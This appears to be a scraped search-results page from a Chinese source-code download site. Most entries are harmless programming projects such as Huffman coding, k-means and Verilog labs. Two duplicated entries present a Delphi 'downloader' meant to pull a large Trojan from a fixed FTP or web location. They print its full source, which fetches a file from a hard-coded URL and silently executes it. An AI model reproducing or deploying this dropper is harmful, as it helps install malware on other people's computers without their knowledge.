Location:
Search - SourceFile
Search list
Description: 执行后可以下载指定程序并执行
你先把大体积木马放到一固定FTP空间上
打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:)
用工具压一下,只有10K
这样说完是不行的,说一下代码:
program wsdgsRoad
uses
URLMon,
ShellApi
var
u,l: pchar
{.$R *.res}
function DownloadFile(SourceFile, DestFile: string): Boolean
begin
GetMem(u,100)
GetMem(l,100)
u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址
l:= c:/downpage.txt //改为你要存放并打开文件的路径
try
Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0
except
Result := False
end
end
begin
if DownloadFile(u, l) then
begin
ShellExecute(0, PChar( open ), PChar(l),
PChar( ), nil, 0)
end
//freemem(u)
//freemem(l)
end.
先试一下。。。。 ok,
明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: |
Size: 1436 |
Author: 韩冰 |
Hits:
Description: 0。11版linux代码,对学习linux和提高c语言有帮助-0. 11 version of Linux code, to learn and improve linux c language help
Platform: |
Size: 110223 |
Author: shuaijinyu |
Hits:
Description: 利用资源文件自定义安装包!-use of resources document custom installation package!
Platform: |
Size: 797118 |
Author: 孔敏 |
Hits:
Description: msp430简易交流频率测试 msp430简易交流频率测试
Platform: |
Size: 4026 |
Author: yezhichao |
Hits:
Description: PS2鼠标实验Verilog HDL代码
Platform: |
Size: 4604 |
Author: 张猛蛟 |
Hits:
Description: PS2键盘实验Verilog HDL代码
Platform: |
Size: 3697 |
Author: 张猛蛟 |
Hits:
Description: 在一段时间内,如果用户没有进行按键操作,系统将进入“睡眠”--低功耗状态
* 用户按键后,系统从低功耗状态转到正常的工作状态
* 在非低功耗状态下,程序接收键盘按键执行加法器操作(因为键盘和LCD限制不能实现复杂
* 的功能,如乘法、减法、除法等)
Platform: |
Size: 4474 |
Author: wei |
Hits:
Description: C++实现的哈弗曼编码,并有流程图(1)I:初始化(Initialization)。从指定的英文文件中Sourcefile.txt读取数据,根据文件内容统计的字符的频度,建立哈夫曼树。
(2)E:编码(Encoding)。利用已经建好的哈夫曼树进行编码,并将每个字符的编码写入文件HuffCode.txt中保存。
(3)C:压缩(Compress)。根据HuffCode.txt中编码对文件Sourcefile.txt进行重新编码,并将重新编码后的内容写入文件CodeFile.txt中。
(4)D:译码(Decoding)。利用已经建好的哈夫曼树将文件CodeFile.txt中的代码进行译码,结果存入文件TextFile中。
(5)P:打印代码文件(Print)。将文件CodeFile.txt的内容显示在终端上,每行50个代码。
(6)T:显示哈夫曼树(Treeprinting)。将已经在内存中的哈夫曼树以直观的方式(树或凹入表形式)显示在终端上。
Platform: |
Size: 115837 |
Author: dongming |
Hits:
Description: 考察缓冲区大小对低级I/O操作的影响 了解文件随机访问技术.编写程序mycopy,实现文件拷贝。
命令行格式为:
mycopy sourcefile destfile
Platform: |
Size: 90884 |
Author: nemo |
Hits:
Description: 使用口线模拟I2C总线,读写EEPROM的方法
Platform: |
Size: 5288 |
Author: wangyongfa |
Hits:
Description: 这是Visualc C++程序设计教程上的源代码
Platform: |
Size: 661712 |
Author: George |
Hits:
Description: 随书源代码,Visual C++,初学者可参考
Platform: |
Size: 639243 |
Author: 张华 |
Hits:
Description: 输入三个学生的成绩,然后根据提示信息,可以选择学生平均成绩、单科最高分、总分以及成绩排名等各种计算。
Platform: |
Size: 39039 |
Author: 海燕 |
Hits:
Description: kmeans This directory contains code implementing the K-means algorithm. Source code may be found in KMEANS.CPP. Sample data isfound in KM2.DAT. The KMEANS program accepts input consisting of vectors and calculates the given number of cluster centers using the K-means algorithm. Output is directed to the screen. Usage for KMEANS is: KMEANS SOURCEFILE <enter> The format of the source file is: NPat - Number of patterns (int) SizeVect - Size of vector (int) NClust - Number of cluster centers(int) vect[1,1] ... vect[1,SizeVect] - vector 1 (real) vect[2,1] ... vect[2,SizeVect] - vector 2 (real) . . . . . . vect[NPat,1] ... vect[NClust,SizeVector] - vector N (real) To compile: ICC KMEANS.CPP <enter>
Platform: |
Size: 3497 |
Author: li |
Hits:
Description: 利用资源文件自定义安装包!-use of resources document custom installation package!
Platform: |
Size: 796672 |
Author: 孔敏 |
Hits:
Description: kmeans This directory contains code implementing the K-means algorithm. Source code may be found in KMEANS.CPP. Sample data isfound in KM2.DAT. The KMEANS program accepts input consisting of vectors and calculates the given number of cluster centers using the K-means algorithm. Output is directed to the screen. Usage for KMEANS is: KMEANS SOURCEFILE <enter> The format of the source file is: NPat - Number of patterns (int) SizeVect - Size of vector (int) NClust - Number of cluster centers(int) vect[1,1] ... vect[1,SizeVect] - vector 1 (real) vect[2,1] ... vect[2,SizeVect] - vector 2 (real) . . . . . . vect[NPat,1] ... vect[NClust,SizeVector] - vector N (real) To compile: ICC KMEANS.CPP <enter> -kmeans This directory contains code implementing the K-means algorithm. Source code may be found in KMEANS.CPP. Sample data isfound in KM2.DAT. The KMEANS program accepts input consisting of vectors and calculates the given number of cluster centers using the K-means algorithm. Output is directed to the screen. Usage for KMEANS is: KMEANS SOURCEFILE <enter> The format of the source file is: NPat- Number of patterns (int) SizeVect- Size of vector (int) NClust- Number of cluster centers(int) vect[1,1] ... vect[1,SizeVect]- vector 1 (real) vect[2,1] ... vect[2,SizeVect]- vector 2 (real) . . . . . . vect[NPat,1] ... vect[NClust,SizeVector]- vector N (real) To compile: ICC KMEANS.CPP <enter>
Platform: |
Size: 3072 |
Author: li |
Hits:
Description: 执行后可以下载指定程序并执行
你先把大体积木马放到一固定FTP空间上
打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:)
用工具压一下,只有10K
这样说完是不行的,说一下代码:
program wsdgsRoad
uses
URLMon,
ShellApi
var
u,l: pchar
{.$R *.res}
function DownloadFile(SourceFile, DestFile: string): Boolean
begin
GetMem(u,100)
GetMem(l,100)
u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址
l:= c:/downpage.txt //改为你要存放并打开文件的路径
try
Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0
except
Result := False
end
end
begin
if DownloadFile(u, l) then
begin
ShellExecute(0, PChar( open ), PChar(l),
PChar( ), nil, 0)
end
//freemem(u)
//freemem(l)
end.
先试一下。。。。 ok,
明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: |
Size: 1024 |
Author: 韩冰 |
Hits:
Description: 0。11版linux代码,对学习linux和提高c语言有帮助-0. 11 version of Linux code, to learn and improve linux c language help
Platform: |
Size: 109568 |
Author: shuaijinyu |
Hits:
Description: PS2鼠标实验Verilog HDL代码-PS2 mouse experiments Verilog HDL code
Platform: |
Size: 4096 |
Author: 张猛蛟 |
Hits:
Description: ks0108 12864液晶程序,包含键盘扫描程序-LCD ks0108 12864 procedures, including the keyboard scanner
Platform: |
Size: 8192 |
Author: wang |
Hits: